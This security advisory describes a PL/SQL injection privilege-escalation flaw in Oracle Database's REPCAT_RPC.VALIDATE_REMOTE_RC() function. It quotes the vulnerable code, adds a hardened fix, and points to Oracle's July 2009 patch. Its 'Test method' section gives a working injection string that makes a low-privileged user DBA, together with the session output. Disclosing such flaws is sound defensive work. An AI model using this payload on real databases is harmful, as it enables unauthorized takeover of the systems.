Oracle Advanced Replication Component REPCAT_RPC.VALIDATE_REMOTE_RC() Function Privilege Escalation Vulnerability

Affected systems:

Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5

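Description:
Oracle Database is a large commercial database system.

The REPCAT_RPC.VALIDATE_REMOTE_RC() function in the Advanced Replication component of Oracle Database executes an anonymous PL/SQL block that may be attacker-controlled. The function takes the name of the currently logged-in user as its first parameter, and its second parameter, VALIDATE_STRING, is placed directly into an anonymous PL/SQL block and executed: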



SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
-- VALIDATE_STRING is concatenated into the block text without any check
DBMS_SQL.PARSE(SQL_CURSOR, 'BEGIN ' || ' :err := sys.dbms_repcat_validate.' ||
    VALIDATE_STRING || '(:canon_gname);' || ' END;', DBMS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'err', ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, 'canon_gname', CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);

This may allow an attacker to execute arbitrary code with elevated privileges.
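A hardened form of the dynamic call shown above, as an added example that is not Oracle's code or the content of its patch. The function name safe_validate_remote_rc is hypothetical, the allow-list contains only the routine name that appears in this advisory (the full set of legitimate names is an assumption to be filled in by the owner of the code), and DBMS_ASSERT is assumed to be available on the database version in use.

```sql
-- Added example, not Oracle's code. safe_validate_remote_rc is a hypothetical
-- name; the allow-list holds only the routine named in this advisory.
CREATE OR REPLACE FUNCTION safe_validate_remote_rc (
    validate_string IN VARCHAR2,
    canon_gname     IN VARCHAR2
) RETURN NUMBER
IS
    sql_cursor INTEGER;
    fn_name    VARCHAR2(32767);
    err        NUMBER;
    dummy      INTEGER;
BEGIN
    -- Step 1: refuse quoted identifiers outright, then require a single
    -- simple SQL name. DBMS_ASSERT.SIMPLE_SQL_NAME raises ORA-44003 for
    -- anything containing parentheses, semicolons, spaces or quotes.
    IF INSTR(validate_string, '"') > 0 THEN
        RAISE_APPLICATION_ERROR(-20001, 'quoted identifiers are not accepted');
    END IF;
    fn_name := UPPER(TRIM(SYS.DBMS_ASSERT.SIMPLE_SQL_NAME(validate_string)));

    -- Step 2: allow-list. A NULL name must fail too, so test it explicitly
    -- (NULL NOT IN (...) evaluates to NULL and would skip the branch).
    IF fn_name IS NULL OR fn_name NOT IN ('VALIDATE_GRP_OBJECTS_LOCAL') THEN
        RAISE_APPLICATION_ERROR(-20002, 'unknown validation routine');
    END IF;

    -- Step 3: only the vetted identifier is concatenated; data stays in binds.
    sql_cursor := DBMS_SQL.OPEN_CURSOR;
    DBMS_SQL.PARSE(sql_cursor,
        'BEGIN :err := sys.dbms_repcat_validate.' || fn_name ||
        '(:canon_gname); END;', DBMS_SQL.NATIVE);
    DBMS_SQL.BIND_VARIABLE(sql_cursor, 'err', err);
    DBMS_SQL.BIND_VARIABLE(sql_cursor, 'canon_gname', canon_gname);
    dummy := DBMS_SQL.EXECUTE(sql_cursor);
    DBMS_SQL.VARIABLE_VALUE(sql_cursor, 'err', err);
    DBMS_SQL.CLOSE_CURSOR(sql_cursor);
    RETURN err;
EXCEPTION
    WHEN OTHERS THEN
        -- Do not leak the cursor when validation or execution fails.
        IF DBMS_SQL.IS_OPEN(sql_cursor) THEN
            DBMS_SQL.CLOSE_CURSOR(sql_cursor);
        END IF;
        RAISE;
END;
/
```

With this check in place, a VALIDATE_STRING that carries extra statements fails at step 1 before any dynamic SQL is parsed.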

<*Source: David Litchfield (david@nextgenss.com)

  Links:
  http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf
  http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
*>

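Test method:
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!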

 

SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION


MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>

Recommendation:

Vendor patch:

Oracle
------
Oracle has released a security advisory (cpujul2009) and corresponding patches for this issue:
cpujul2009: Oracle Critical Patch Update Advisory – July 2009
Link:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
